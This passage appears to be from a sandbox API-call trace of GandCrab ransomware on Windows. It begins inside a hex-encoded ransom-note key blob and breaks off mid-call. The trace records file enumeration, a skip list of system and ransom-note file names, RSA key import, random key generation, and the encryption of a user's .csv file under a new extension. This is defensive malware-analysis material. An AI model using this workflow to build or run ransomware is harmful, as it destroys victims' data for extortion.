x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0090.170] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0090.171] CloseHandle (hObject=0x2d4) returned 1 [0090.171] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.171] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.172] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x1ea)) [0090.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.172] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.172] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.172] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock") returned 133 [0090.172] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0090.172] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.173] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\") returned 109 [0090.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\*" [0090.173] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503738 [0090.173] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.173] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.173] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.173] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.173] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.173] lstrcmpW (lpString1="6hr7PuTfGJYnsw.csv", lpString2=".") returned 1 [0090.173] lstrcmpW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="..") returned 1 [0090.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="6hr7PuTfGJYnsw.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv" [0090.173] lstrlenW (lpString=".titwmvjl") returned 9 [0090.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned 127 [0090.173] VirtualAlloc (lpAddress=0x0, dwSize=0x13e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.174] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv.titwmvjl") returned 136 [0090.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned 127 [0090.174] lstrlenW (lpString=".csv") returned 4 [0090.174] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.174] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".csv ") returned 5 [0090.174] lstrcmpiW (lpString1=".csv", lpString2=".titwmvjl") returned -1 [0090.174] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned 127 [0090.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned 127 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="desktop.ini") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="autorun.inf") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="ntuser.dat") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="iconcache.db") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="bootsect.bak") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="boot.ini") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="ntuser.dat.log") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="thumbs.db") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="KRAB-DECRYPT.html") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="CRAB-DECRYPT.html") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="ntldr") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="NTDETECT.COM") returned -1 [0090.174] lstrcmpiW (lpString1="6hr7PuTfGJYnsw.csv", lpString2="Bootfont.bin") returned -1 [0090.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv") returned 127 [0090.175] lstrlenW (lpString=".csv") returned 4 [0090.175] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.175] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".csv ") returned 5 [0090.175] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.175] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.175] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\6hr7putfgjynsw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.175] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.175] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.176] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.176] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.177] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.178] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.178] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.178] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.178] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.178] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.178] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.179] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.179] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.180] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.180] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.180] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.180] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.180] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.181] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503778) returned 1 [0090.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.182] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.182] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.182] GetLastError () returned 0x0 [0090.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.182] CryptDestroyKey (hKey=0x503778) returned 1 [0090.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.182] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.182] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.184] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5038f8) returned 1 [0090.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.184] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.184] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.185] GetLastError () returned 0x0 [0090.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.185] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.185] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.185] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.185] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.185] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0xb512, lpOverlapped=0x0) returned 1 [0090.192] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xffff4aee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.192] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb512, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0xb512, lpOverlapped=0x0) returned 1 [0090.194] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.194] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, 